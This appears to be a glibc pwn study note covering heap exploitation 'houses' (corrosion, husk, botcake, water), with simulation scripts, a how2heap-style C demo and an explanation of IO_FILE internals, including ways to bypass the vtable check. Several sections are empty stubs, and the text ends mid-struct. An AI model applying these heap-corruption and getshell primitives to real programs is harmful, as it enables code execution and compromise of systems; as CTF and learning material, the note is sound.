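The two largebin-insertion writes behind the forged bk/bk_nextsize values can be simulated on a byte array. This is a simplified sketch assuming x86-64 and the 2.23-era sorting code (victim->bk_nextsize->fd_nextsize = victim, then bck->fd = victim); fake_chunk, the victim heap addresses and the helper names are hypothetical. It illustrates why bk_nextsize = fake_chunk - 0x18 - 5 turns byte 5 of a heap pointer (usually 0x55 or 0x56) into the fake chunk's size, and why, under these simplified checks, only 0x56 (IS_MMAPPED set) survives malloc, which roughly halves the success rate.

```python
import struct

# Simplified model (x86-64, glibc 2.23-style largebin insertion).
# All addresses are hypothetical.
def storm_writes(fake_chunk: int, victim: int, base: int, mem: bytearray) -> None:
    bk = fake_chunk + 8                   # large_bin->bk
    bk_nextsize = fake_chunk - 0x18 - 5   # large_bin->bk_nextsize
    # victim->bk_nextsize->fd_nextsize = victim  (fd_nextsize is at +0x20)
    struct.pack_into("<Q", mem, bk_nextsize + 0x20 - base, victim)
    # bck->fd = victim, with bck = large_bin->bk  (fd is at +0x10)
    struct.pack_into("<Q", mem, bk + 0x10 - base, victim)

def fake_size(victim: int) -> int:
    """Return the qword that ends up in fake_chunk's size field."""
    fake_chunk = 0x1000
    base = fake_chunk - 0x20              # mem[0] corresponds to fake_chunk - 0x20
    mem = bytearray(0x40)
    storm_writes(fake_chunk, victim, base, mem)
    return struct.unpack_from("<Q", mem, fake_chunk + 8 - base)[0]

def passes_malloc_checks(size: int, chunk_size: int = 0x50) -> bool:
    """Simplified: size must match malloc(0x48); the arena assertion in
    __libc_malloc passes if IS_MMAPPED (0x2) is set or NON_MAIN_ARENA (0x4) is clear."""
    IS_MMAPPED, NON_MAIN_ARENA = 0x2, 0x4
    if (size & ~0x7) != chunk_size:
        return False
    return bool(size & IS_MMAPPED) or not (size & NON_MAIN_ARENA)

for heap in (0x563412345000, 0x553412345000):
    size = fake_size(heap)
    print(hex(size), passes_malloc_checks(size))
```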

house of corrosion

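  • Versions: 2.23~
  • Goal: arbitrary address read/write, and transplanting a value from one arbitrary address to another
  • Forged structures
    • chunk size = (target_addr - &main_arena.fastbinsY) x 2 + 0x20
  • Method:
    • Write target_message to target_addr
      • Free fastbin chunk A so that it is recorded at target_addr, with A->fd pointing to target_message
    • Write target_message to target_addr (detailed steps)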
      • malloc(A,size=chunk size)
      • unsortedbin attack change global_max_fast
      • free(A)
      • 使A->fdtarget_message
      • malloc(A)
    • 转移attack_addrtarget_messagetarget_addr地址上
      • src_size=(attack_addr-fastbinY)*2+0x20
      • dst_size=(target_addr-fastbinY)*2+0x20
      • malloc(A,size=dst_size)
      • malloc(B,size=dst_size)
      • free(B)
      • free(A)
      • unsortedbin attack change global_max_fast
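      • Partially overwrite A->fd so that A (at the head of target_addr's fastbin slot) points to itself
      • malloc(A), then edit(A->size=src_size), then free(A)
      • A is now recorded in attack_addr's slot, and its fd becomes target_message (the value previously stored at attack_addr)
      • edit(A->size=dst_size), then malloc(A): A is taken from target_addr's slot, which is updated to A->fd, i.e. target_message
  • Prerequisites
    • UAF, heap overflow
    • No address leak needed; brute force with a 1/16 chance
    • Allocations of arbitrary size
    • Able to overwrite global_max_fast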
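The size formula follows from glibc's fastbin_index on x86-64, (size >> 4) - 2, combined with fastbinsY being an array of 8-byte pointers. A small sketch of the arithmetic in both directions, assuming x86-64 and that global_max_fast has already been overwritten so these sizes are treated as fastbin sizes; the addresses are hypothetical.

```python
# house of corrosion size arithmetic (x86-64). Addresses are hypothetical.
def corrosion_size(target_addr: int, fastbins_y: int) -> int:
    """Chunk size whose fastbin slot is target_addr."""
    delta = target_addr - fastbins_y
    assert delta >= 0 and delta % 8 == 0, "target must be 8-byte aligned, above fastbinsY"
    return delta * 2 + 0x20

def fastbin_slot(size: int, fastbins_y: int) -> int:
    """Address free() writes the chunk pointer to: &fastbinsY[fastbin_index(size)]."""
    return fastbins_y + 8 * ((size >> 4) - 2)

FASTBINS_Y = 0x7ffff7dd1b28          # hypothetical &main_arena.fastbinsY
target = FASTBINS_Y + 0x1d68         # hypothetical target_addr
size = corrosion_size(target, FASTBINS_Y)
print(hex(size), fastbin_slot(size, FASTBINS_Y) == target)   # 0x3af0 True
```

src_size and dst_size in the transplant steps are the same computation applied to attack_addr and target_addr.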

house of husk

  • Versions: 2.23~2.35
  • Goal: backdoor or getshell
  • Forged structures
    • __printf_function_table!=NULL
    • __printf_arginfo_table=control_addr
    • __printf_arginfo_table[spec]=backdoor_addr
  • Call sequence:
    • printf->vprintf->(if __printf_function_table!=NULL)printf_positional->__parse_one_specmb->(*__printf_arginfo_table[spec->info.spec])
  • Method:
    • Leak libc via the unsorted bin, then use an unsortedbin attack on global_max_fast
  • Prerequisites
    • UAF, heap overflow
    • Allocations of arbitrary size
    • Able to overwrite global_max_fast
  • printf:
    • __vfprintf_internal
      • buffered_vfprintf
    • printf_positional
      • __parse_one_specmb
        • (*__printf_arginfo_table[spec->info.spec])
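Because __parse_one_specmb indexes __printf_arginfo_table by the conversion character, the forged table only needs the target pointer at offset spec * 8 from the address stored in __printf_arginfo_table. A hedged sketch assuming x86-64 (8-byte pointers) and a hypothetical target address; build_fake_table is an illustrative helper, not part of any library.

```python
import struct

def arginfo_slot_offset(spec: str) -> int:
    """Offset of __printf_arginfo_table[spec] from the table base (x86-64)."""
    return ord(spec) * 8

def build_fake_table(spec: str, target: int, size: int = 0x400) -> bytes:
    table = bytearray(size)                  # every other slot stays NULL
    struct.pack_into("<Q", table, arginfo_slot_offset(spec), target)
    return bytes(table)

print(hex(arginfo_slot_offset("s")), hex(arginfo_slot_offset("d")))  # 0x398 0x320
fake = build_fake_table("s", 0xdeadbeef)     # hypothetical backdoor / one_gadget address
```

So for a program that later calls printf("%s", ...), the 's' slot at +0x398 is the one that matters.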

house of mind

house of muney

house of rusk

house of crust

house of io

house of botcake

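The first free puts the chunk into the unsorted bin and the second free puts it into the tcache bin. This builds a chunk overlap and thus a double free in the tcache, which makes tcache poisoning easy for the follow-up attack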

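Allocate 7 chunks of a suitable size (larger than the largest fastbin size and no larger than the largest tcache size) that will later fill the tcache. Then allocate a chunk prev to be consolidated with, and a victim chunk of the same size as the first 7. Finally allocate a chunk of any size to separate them from the top chunk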

void* chunks[7];  
for(int i=0; i<7; i++){
chunks[i]=malloc(0x80);
}
void* prev=malloc(0x80);
void* victim=malloc(0x80);
malloc(0x10);

Free the first 7 chunks to fill the tcache; then free victim and then prev, which consolidates prev and victim

for(int i=0; i<7; i++){  
free(chunks[i]);
}
free(victim);
free(prev);

Allocate one chunk of the same size so that a slot opens up in the tcache bin

malloc(0x80);

Free victim again; this time victim goes into the tcache, giving a double free

free(victim);

Allocate a chunk of a suitable size (larger than max(prev, victim) and no larger than prev+victim), then allocate a chunk of the same size as victim; these two chunks now overlap.

char* a=malloc(0x100);  
char* b=malloc(0x80);
assert(a+0x100>b);
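The overlap checked by the assert can be verified with plain chunk arithmetic. This sketch assumes x86-64 (SIZE_SZ = 8, 16-byte alignment) and a hypothetical address P for prev's chunk header; request2size mirrors glibc's macro of the same name.

```python
# House of botcake overlap arithmetic (x86-64). P is a hypothetical address.
MINSIZE, ALIGN, SIZE_SZ = 0x20, 0x10, 8

def request2size(req: int) -> int:
    """glibc request2size: add the size field, round up to 16, at least MINSIZE."""
    return max(MINSIZE, (req + SIZE_SZ + ALIGN - 1) & ~(ALIGN - 1))

P = 0x555555559a00                            # prev's chunk header
victim_chunk = P + request2size(0x80)         # victim sits right after prev
merged = 2 * request2size(0x80)               # prev + victim after consolidation
assert request2size(0x100) <= merged          # malloc(0x100) fits in the merged chunk

a = P + 0x10                                  # malloc(0x100): user pointer of the merged chunk
b = victim_chunk + 0x10                       # malloc(0x80): victim, taken back from tcache
print(hex(request2size(0x80)), hex(merged), a + 0x100 > b)   # 0x90 0x120 True
```

Since b - a is 0x90, writing into a at offset 0x80 reaches victim's size field and offset 0x90 reaches its tcache next pointer.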

house of water

  • Works without a show (leak) function; requires a UAF (EAF) and the ability to allocate very large chunks

how2heap demo

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

int main(){
void *_ = NULL;
setbuf(stdin,NULL);
setbuf(stdout,NULL);
setbuf(stderr,NULL);

//step1: allocate chunks of 0x3d8 and 0x3e8 bytes and free them in turn, forging a size of 0x10001 on tcache_perthread_struct (at offset 0x88)
void *fake_size_lsb = malloc(0x3d8);
void *fake_size_msb = malloc(0x3e8);
free(fake_size_lsb);
free(fake_size_msb);

void *metadata = (void *)((long)(fake_size_lsb) & ~(0xfff)); //heap base: the page holding tcache_perthread_struct

//Allocate chunks to fill the 0x90 tcache list later, so that 0x90 chunks freed afterwards go into the unsorted bin
void *x[7];
for(int i = 0 ; i < 7 ; i ++){
x[i] = malloc(0x88);
}

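//Create three chunks with spacer chunks in between to prevent consolidation; all three will end up in the unsorted bin. Then allocate a huge 0xf000 chunk as padding up to 0x10000, so that the 0x10001 size forged on tcache_perthread_struct is a legal size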
void *unsorted_start = malloc(0x88);
_ = malloc(0x18);
void *unsorted_middle = malloc(0x88);
_ = malloc(0x18);
void *unsorted_end = malloc(0x88);
_ = malloc(0x18);
_ = malloc(0xf000);

//Create a 0x20 chunk and use it to forge the prev_size (0x10000) and size (0x20) of the chunk that follows the fake chunk
void *end_of_fake = malloc(0x18);
*(long *)end_of_fake = 0x10000;
*(long *)(end_of_fake + 0x8) = 0x20;

//Fill the tcache bin
for(int i = 0 ; i < 7 ; i ++){
free(x[i]);
}

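//Forge a 0x31 chunk header just above unsorted_start and free it. Because it goes into the tcache bin, a tcache key is written that overwrites unsorted_start's original size, so the size must be restored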
*(long *)(unsorted_start - 0x18) = 0x31;
free(unsorted_start - 0x10);
*(long *)(unsorted_start - 0x8) = 0x91;

//Forge a 0x21 chunk header just above unsorted_end and free it. Because it goes into the tcache bin, a tcache key is written that overwrites unsorted_end's original size, so the size must be restored
*(long *)(unsorted_end - 0x18) = 0x21;
free(unsorted_end - 0x10);
*(long *)(unsorted_end - 0x8) = 0x91;

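//In tcache_perthread_struct, the 0x20 tcache bin is the first entry and the 0x30 tcache bin is the second, so these two pointers sit right below the 0x10001 value. In other words, if the 0x10001 chunk enters a bin, its fd pointer points to unsorted_end and its bk pointer points to unsorted_start

//Free the three chunks; the unsorted bin becomes unsorted_start->unsorted_middle->unsorted_end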
free(unsorted_end);
free(unsorted_middle);
free(unsorted_start);

//Point unsorted_start's fd and unsorted_end's bk at the fake chunk
*(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80);
*(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80);

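//The unsorted bin becomes unsorted_start->fake_chunk->unsorted_end
//When splitting: if the unsorted bin holds no chunk of a suitable size, the chunks are sorted into the smallbin or largebin in order before splitting; here unsorted_start and unsorted_end go into the smallbin while the fake chunk goes into the largebin
//So request any size below 0x10000: after sorting, only the fake chunk is in the largebin, so libc addresses are written at two places, and those two places are two of the tcache bin entries
//After that, requesting a chunk of the corresponding tcache size creates a chunk located in libc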
void *meta_chunk = malloc(0x288);
assert(meta_chunk == (metadata+0x90));
}
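Step 1 works because each free increments a uint16_t count in tcache_perthread_struct. The sketch below recomputes where the two counts land and which entries[] slots become the fake chunk's fd/bk. It assumes glibc >= 2.30 on x86-64 (uint16_t counts[64] followed by entries[64], stored in the first heap chunk at metadata with user data at +0x10); the helper names are hypothetical.

```python
import struct

# Assumes glibc >= 2.30, x86-64:
#   struct tcache_perthread_struct { uint16_t counts[64]; tcache_entry *entries[64]; };
# stored in the first heap chunk ("metadata"), user data at metadata + 0x10.
TCACHE_MAX_BINS, MINSIZE, ALIGN, SIZE_SZ = 64, 0x20, 0x10, 8

def request2size(req: int) -> int:
    return max(MINSIZE, (req + SIZE_SZ + ALIGN - 1) & ~(ALIGN - 1))

def tidx(csize: int) -> int:
    """csize2tidx: tcache bin index for a chunk size."""
    return (csize - MINSIZE + ALIGN - 1) // ALIGN

def count_offset(req: int) -> int:
    """Offset of counts[idx] from metadata for a malloc(req) chunk."""
    return 0x10 + 2 * tidx(request2size(req))

def entry_offset(csize: int) -> int:
    """Offset of entries[idx] from metadata for a chunk of size csize."""
    return 0x10 + 2 * TCACHE_MAX_BINS + 8 * tidx(csize)

tcache = bytearray(0x290)                        # the whole tcache chunk
for req in (0x3d8, 0x3e8):                       # free(fake_size_lsb); free(fake_size_msb)
    off = count_offset(req)
    (count,) = struct.unpack_from("<H", tcache, off)
    struct.pack_into("<H", tcache, off, count + 1)

fake_size = struct.unpack_from("<Q", tcache, 0x88)[0]   # size field of metadata+0x80
print(hex(count_offset(0x3d8)), hex(count_offset(0x3e8)), hex(fake_size))  # 0x88 0x8a 0x10001
print(hex(entry_offset(0x20)), hex(entry_offset(0x30)))  # 0x90 0x98 -> fake fd, fake bk
```

This matches the demo: the fake chunk sits at metadata+0x80, its fd/bk are the 0x20 and 0x30 tcache entries, and malloc(0x288) returns metadata+0x90.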
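Next, attack _IO_FILE: set flag to 0xfbad1800 so that the buffer is flushed and its contents are printed. _IO_read_ptr, _IO_read_end and _IO_read_base can be anything (set them to 0); also set _IO_write_base, _IO_write_ptr and _IO_write_end appropriately, and the contents from _IO_write_base to _IO_write_ptr will be printed

After leaking libc, house of apple can be used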

house of tangerine(house of orange plus)

house of minho

IO_FILE

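IO data structures

For LBA hard disks, data must be read and written one block at a time. If every read or write only touched a small amount of data, the cost to the system would be very high, so the C library uses a buffer. The buffer exists to reduce the cost of operating on external hardware; everything is done in service of the external device.

1. Reading from external hardware: to reduce the cost, a whole "block" of data is read from the hardware at once and placed in a buffer; the target then consumes it from the front, and the hardware is read again only after everything has been consumed. This buffer is called the input buffer.
2. Writing to external hardware: to reduce the cost, data is not written as soon as it appears; it is first copied from the source into a buffer, and only when the buffer is full is its content written to the hardware in one go. This buffer is called the output buffer.

Taking reads from external hardware as an example, we need pointers to the start (base), end (end) and current position (ptr) of the input buffer. Clearly, when ptr == end the input buffer has been fully consumed and must be refilled from the hardware. Likewise, for writes we need pointers to the start (base), end (end) and current position (ptr) of the output buffer; when ptr == end the output buffer is full and can be written to the hardware.

This looks clear, but a few points are easy to confuse. Both buffers store data and both serve the external device, but data flows in opposite directions, so the useful part of each buffer differs.
1. For the input buffer, ptr to end is the useful (unread) data, and base to ptr is data that has already been consumed.
2. For the output buffer, base to ptr is the content to be written to the hardware (the useful data), and ptr to end is free space.
3. The ends of the two buffers differ:
   1. For the input buffer, the data read from disk may not fill the whole buffer block, so _IO_buf_end != _IO_read_end; the input buffer uses _IO_read_end to detect its end.
   2. For the output buffer, the end of the buffer is the end of the output area, _IO_buf_end == _IO_write_end; the output buffer usually uses _IO_buf_end to detect its end.

Although input and output buffers serve different purposes, both are just a block of memory. A device may be both readable and writable, so to save space a single buffer can be used: it acts as the input buffer when reading and as the output buffer when writing. That gives us 8 pointers: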

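char *_IO_buf_base;   // base address of the buffer
char *_IO_buf_end;    // end address of the buffer
char *_IO_read_base;  // base address of the input buffer
char *_IO_read_ptr;   // current input position
char *_IO_read_end;   // end address of the input buffer
char *_IO_write_base; // base address of the output buffer
char *_IO_write_ptr;  // current output position
char *_IO_write_end;  // end address of the output buffer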

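Reading from a file: the program reads a batch of data from fd into the buffer (_IO_buf_base to _IO_buf_end), and _IO_read_ptr marks how far data has been copied to the target, i.e. _IO_read_ptr to _IO_read_end is data not yet copied to the target. When _IO_read_ptr == _IO_read_end, the input buffer has no data left and must be refilled from the file.

Writing to a file: the program first copies data from the source into the buffer, and _IO_write_ptr marks how far data has been written, i.e. _IO_write_ptr to _IO_write_end is the remaining space. When _IO_write_ptr == _IO_buf_end, everything is written to fd.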

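IO data operations

1. Reading data from disk

  1. Read a batch (block) of data from fd into the input buffer (_IO_buf_base to _IO_buf_end) and initialize _IO_read_base, _IO_read_ptr and _IO_read_end (usually _IO_read_ptr == _IO_read_base, though they may differ).
  2. Copy data from _IO_read_ptr to the destination memory, advancing _IO_read_ptr.
  3. When _IO_read_ptr == _IO_read_end, the buffer has no data left and must be refilled from the file; go back to step 1.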

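2. Writing data to disk

  1. Copy data from the source into the output buffer; _IO_write_ptr points to the position written so far.
  2. When _IO_write_ptr == _IO_buf_end, write the whole buffer to fd, reset _IO_write_ptr to _IO_write_base, and repeat step 1.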
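The write path above can be mimicked with a toy buffer that keeps the same pointers as indices. This is only an illustration: ToyOutBuf is hypothetical, _IO_write_end is treated as equal to _IO_buf_end, and appending to `flushed` stands in for the write system call on fd.

```python
# Toy model of a FILE output buffer: indices play the role of the pointers.
class ToyOutBuf:
    def __init__(self, size: int):
        self.buf = bytearray(size)
        self.write_base = 0          # _IO_write_base
        self.write_ptr = 0           # _IO_write_ptr
        self.buf_end = size          # _IO_buf_end (== _IO_write_end here)
        self.flushed = bytearray()   # what reached the "device"

    def flush(self):
        # output [write_base, write_ptr) and reset write_ptr to write_base
        self.flushed += self.buf[self.write_base:self.write_ptr]
        self.write_ptr = self.write_base

    def write(self, data: bytes):
        for byte in data:
            if self.write_ptr == self.buf_end:   # buffer full -> write to fd
                self.flush()
            self.buf[self.write_ptr] = byte
            self.write_ptr += 1

out = ToyOutBuf(4)
out.write(b"hello")
print(out.flushed, out.buf[:out.write_ptr])   # bytearray(b'hell') bytearray(b'o')
```

The stdout leak trick relies on the same rule: whatever lies between write_base and write_ptr is what gets written out.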

3. Allocating the buffer

Allocate a buffer and set _IO_buf_base to its start and _IO_buf_end to its end.

_IO_file_jumps functions

1._IO_new_file_finish

The file-finishing operation, which does the following: 1. flushes all buffers 2. closes the file

2._IO_new_file_overflow

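Mainly handles writing data to disk when the output buffer is used up.

Internally the function is quite complex and includes several checks; for example, if the buffer does not exist yet it is initialized first. It also takes a character argument ch:
1. If ch == EOF, output the range f->_IO_write_base to f->_IO_write_ptr.
2. If ch != EOF and f->_IO_write_ptr == f->_IO_buf_end, output the whole buffer.
3. If ch == '\n', output f->_IO_write_base to f->_IO_write_ptr plus the newline.
4. If none of these apply, return ch.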

3._IO_new_file_underflow

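Similar to _IO_new_file_overflow, this function reads data from disk, each time into the range _IO_buf_base to _IO_buf_end.

Because the disk may not contain that much data, _IO_read_end is set according to the number of bytes actually read. If the buffer does not exist it is initialized first. The function returns the character at _IO_read_ptr.

4.__GI__IO_default_uflow(_IO_default_uflow)

This function calls _IO_new_file_underflow and performs a few simple checks.

5.__GI__IO_default_pbackfail(_IO_default_pbackfail)

Handles pushing characters back into the input (e.g. for ungetc); not important here.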

6._IO_new_file_xsputn

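The main purpose of this function is to copy data from the source into the output buffer. Several cases arise:
1. If the data to write is smaller than the remaining space (_IO_buf_end - _IO_write_ptr), it is copied straight into the output buffer.
2. If the data to write is larger than the remaining space (_IO_buf_end - _IO_write_ptr):
   1. fill the output buffer first, then call _IO_new_file_overflow to flush it;
   2. the remaining data goes through _IO_new_file_xsputn again.

Note: the everyday output functions mainly end up calling this function.

7.__GI__IO_file_xsgetn(_IO_file_xsgetn)

The main purpose of this function is to copy data from the input buffer to the target. Several cases arise:
1. If the data to read is smaller than the remaining data (_IO_read_end - _IO_read_ptr), it is copied straight to the target.
2. If the data to read is larger than the remaining data (_IO_read_end - _IO_read_ptr):
   1. first copy out everything in the input buffer, then call _IO_new_file_underflow to read another block from disk;
   2. if a very large amount of data is needed, call __GI__IO_file_read to read directly from disk.

Note: the everyday input functions mainly end up calling this function.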

8._IO_new_file_seekoff

Sets the offset, i.e. the ptr pointers discussed above.

9._IO_default_seekpos

Simply calls _IO_new_file_seekoff.

10._IO_new_file_setbuf

This one is simple; as the name suggests it sets the buffer and initializes the buffer pointers: 1. _IO_write_base = _IO_write_ptr = _IO_write_end = _IO_buf_base 2. _IO_read_base = _IO_read_ptr = _IO_read_end = _IO_buf_base (via the _IO_setg macro)

11._IO_new_file_sync

Synchronization function; synchronizes the disk with the buffer.

12.__GI__IO_file_doallocate(_IO_default_doallocate)

The function that allocates the buffer; after allocation the input and output buffers are initialized.

13.__GI__IO_file_read(_IO_file_read)

The final input function, a thin wrapper around the read syscall.

14._IO_new_file_write

The final output function, a thin wrapper around the write syscall.

15.__GI__IO_file_seek(_IO_file_seek)

Calls __lseek64.

16.__GI__IO_file_close(_IO_file_close)

As the name says, closes the file.

17.__GI__IO_file_stat(_IO_file_stat)

Gets the status of the file descriptor by calling __fxstat64.

18._IO_default_showmanyc

Unused; returns -1.

19._IO_default_imbue

Unused.

20. Other details

flag bits

`#define _IO_MAGIC 0xFBAD0000 /* Magic number */`
`#define _OLD_STDIO_MAGIC 0xFABC0000 /* Emulate old stdio. */`
`#define _IO_MAGIC_MASK 0xFFFF0000`
`#define _IO_USER_BUF 1 /* User owns buffer; don't delete it on close. */`
`#define _IO_UNBUFFERED 2`
`#define _IO_NO_READS 4 /* Reading not allowed */`
`#define _IO_NO_WRITES 8 /* Writing not allowd */`
`#define _IO_EOF_SEEN 0x10`
`#define _IO_ERR_SEEN 0x20`
`#define _IO_DELETE_DONT_CLOSE 0x40 /* Don't call close(_fileno) on cleanup. */`
`#define _IO_LINKED 0x80 /* Set if linked (using _chain) to streambuf::_list_all.*/`
`#define _IO_IN_BACKUP 0x100`
`#define _IO_LINE_BUF 0x200`
`#define _IO_TIED_PUT_GET 0x400 /* Set if put and get pointer logicly tied. */`
`#define _IO_CURRENTLY_PUTTING 0x800`
`#define _IO_IS_APPENDING 0x1000`
`#define _IO_IS_FILEBUF 0x2000`
`#define _IO_BAD_SEEN 0x4000`
`#define _IO_USER_LOCK 0x8000`
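A small decoder for these bits helps when reading _flags in a debugger, for example the 0xfbad2488 of the freshly opened file in the pwndbg dump below, or the 0xfbad1800 used for the stdout leak. The table simply mirrors the defines above; decode_flags is a hypothetical helper.

```python
# Decode an _IO_FILE _flags value using the bit definitions listed above.
IO_FLAGS = {
    0x1: "_IO_USER_BUF", 0x2: "_IO_UNBUFFERED", 0x4: "_IO_NO_READS",
    0x8: "_IO_NO_WRITES", 0x10: "_IO_EOF_SEEN", 0x20: "_IO_ERR_SEEN",
    0x40: "_IO_DELETE_DONT_CLOSE", 0x80: "_IO_LINKED", 0x100: "_IO_IN_BACKUP",
    0x200: "_IO_LINE_BUF", 0x400: "_IO_TIED_PUT_GET", 0x800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING", 0x2000: "_IO_IS_FILEBUF", 0x4000: "_IO_BAD_SEEN",
    0x8000: "_IO_USER_LOCK",
}
IO_MAGIC, IO_MAGIC_MASK = 0xFBAD0000, 0xFFFF0000

def decode_flags(flags: int) -> list:
    names = [name for bit, name in IO_FLAGS.items() if flags & bit]
    if (flags & IO_MAGIC_MASK) == IO_MAGIC:
        names.insert(0, "_IO_MAGIC")
    return names

print(decode_flags(0xfbad1800))  # ['_IO_MAGIC', '_IO_CURRENTLY_PUTTING', '_IO_IS_APPENDING']
```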

flush (_IO_do_flush)

Flushes the buffer, i.e. empties the output buffer.

Flush-all function (fflush)

# define fflush(s) _IO_fflush (s)  //  /assert/assert.c
// /libio/iofflush.c
int _IO_fflush (FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF :0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

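As shown, when its argument is NULL, fflush flushes all files (_IO_flush_all_lockp => _IO_OVERFLOW); when it is not NULL, it syncs the given file. The two cases take different paths.

Buffer-setting macros

_IO_setg, _IO_setp, etc.

vtable checks

vtable checking was added in 2.24: IO_validate_vtable checks whether the vtable lies outside the allowed range and, if so, calls _IO_vtable_check. Many of the houses found since then do not abuse the file jump table but other internal jump tables; they are all quite similar. A brief summary:

  1. 2.23 has no restrictions: the vtable can be hijacked onto the heap and its contents modified, then FSOP is triggered.
  2. 2.24 introduced the vtable check, so moving the whole vtable onto the heap is no longer possible; it was found that the internal vtables _IO_str_jumps and _IO_wstr_jumps can be used instead.
  3. From 2.28 on, _IO_str_finish calls free directly, which breaks the technique above and led to other call chains.

vtable range

The vtable position check is done mainly in IO_validate_vtable. Before 2.37 the allowed range is the 0xd60-byte region between _IO_helper_jumps and _IO_str_jumps, which contains the following vtables: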

_IO_helper_jumps
_IO_helper_jumps
_IO_cookie_jumps
_IO_proc_jumps
_IO_str_chk_jumps
_IO_wstrn_jumps
_IO_wstr_jumps
_IO_wfile_jumps_maybe_mmap
_IO_wfile_jumps_mmap
__GI__IO_wfile_jumps
_IO_wmem_jumps
_IO_mem_jumps
_IO_strn_jumps
_IO_obstack_jumps
_IO_file_jumps_maybe_mmap
_IO_file_jumps_mmap
__GI__IO_file_jumps
_IO_str_jumps
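The range test itself is a single unsigned comparison: IO_validate_vtable subtracts __start___libc_IO_vtables from the vtable pointer as a uintptr_t, so anything below the section wraps around to a huge offset. A sketch of that comparison in Python, with hypothetical section bounds (the size is the 0xd60 quoted above).

```python
# Model of IO_validate_vtable's range check (glibc >= 2.24).
MASK64 = (1 << 64) - 1

def vtable_ok(vtable: int, start: int, stop: int) -> bool:
    """Mirror of the check; False means _IO_vtable_check() runs."""
    section_length = (stop - start) & MASK64
    offset = (vtable - start) & MASK64       # uintptr_t subtraction wraps around
    return offset < section_length

START = 0x7ffff7dcc000        # hypothetical __start___libc_IO_vtables
STOP = START + 0xd60          # section size quoted above (before 2.37)

print(vtable_ok(START + 0x100, START, STOP))   # inside the section -> True
print(vtable_ok(START - 8, START, STOP))       # below it: wraps to a huge offset -> False
print(vtable_ok(0x555555559000, START, STOP))  # a heap address -> False
```

This is why the post-2.24 houses point vtable at a shifted address inside this section (e.g. _IO_str_jumps - 8) rather than at the heap.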

Attacking _IO_vtable_check

If IO_validate_vtable finds the vtable out of range, it calls _IO_vtable_check:

void attribute_hidden _IO_vtable_check (void)
{
#ifdef SHARED
  /* Honor the compatibility flag.  */
  void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (flag);
#endif
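  if (flag == &_IO_vtable_check) // compatibility flag set: accept the foreign vtable
    return;
  /* ... remaining checks omitted ... */
#endif
  __libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");
}
So as long as certain conditions are met, the vtable check can still be bypassed:
1. Leak ptr_guard, compute the mangled value for IO_accept_foreign_vtables, and overwrite it.
2. Since IO_accept_foreign_vtables is usually 0, simply overwriting ptr_guard with &_IO_vtable_check also works.
Either way, we need the ld file.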

Foreign vtables

check_stdfiles_vtables is the function that enables foreign vtables; if it can be made to run, the vtable check can also be bypassed

static void  check_stdfiles_vtables (void)
{
  if (_IO_2_1_stdin_.vtable != &_IO_file_jumps
      || _IO_2_1_stdout_.vtable != &_IO_file_jumps
      || _IO_2_1_stderr_.vtable != &_IO_file_jumps)
    IO_set_accept_foreign_vtables (&_IO_vtable_check);
}

IO_FILE structures

_IO_FILE_plus

0x0   _flags
0x8 _IO_read_ptr
0x10 _IO_read_end
0x18 _IO_read_base
0x20 _IO_write_base
0x28 _IO_write_ptr
0x30 _IO_write_end
0x38 _IO_buf_base
0x40 _IO_buf_end
0x48 _IO_save_base
0x50 _IO_backup_base
0x58 _IO_save_end
0x60 _markers
0x68 _chain
0x70 _fileno
0x74 _flags2
0x78 _old_offset
0x80 _cur_column
0x82 _vtable_offset
0x83 _shortbuf
0x88 _lock
0x90 _offset
0x98 _codecvt
0xa0 _wide_data
0xa8 _freeres_list
0xb0 _freeres_buf
0xb8 __pad5
0xc0 _mode
0xc4 _unused2
0xd8 vtable
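With this table, a fake _IO_FILE_plus can be assembled as raw bytes without pwntools. A minimal sketch assuming x86-64 and the offsets listed above; the hypothetical fake_file_plus helper only supports a handful of fields and leaves everything else zero.

```python
import struct

# Offsets from the _IO_FILE_plus table above (x86-64).
OFF = {"_flags": 0x0, "_IO_write_base": 0x20, "_IO_write_ptr": 0x28,
       "_IO_buf_base": 0x38, "_chain": 0x68, "_lock": 0x88,
       "_wide_data": 0xa0, "_mode": 0xc0, "vtable": 0xd8}

def fake_file_plus(**fields) -> bytes:
    buf = bytearray(0xe0)                         # sizeof(struct _IO_FILE_plus)
    for name, value in fields.items():
        if isinstance(value, bytes):              # e.g. _flags = b"/bin/sh\x00"
            buf[OFF[name]:OFF[name] + len(value)] = value
        else:
            fmt = "<i" if name == "_mode" else "<Q"   # _mode is a 32-bit int
            struct.pack_into(fmt, buf, OFF[name], value)
    return bytes(buf)

f = fake_file_plus(_flags=b"/bin/sh\x00", _IO_write_base=0, _IO_write_ptr=1,
                   _mode=0, vtable=0xdeadbeef)    # hypothetical vtable address
```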

_IO_wide_data

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable;
};

_IO_wstrn_jumps

const struct _IO_jump_t _IO_wstrn_jumps attribute_hidden =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_wstr_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wstrn_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wstr_underflow),
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wstr_pbackfail),
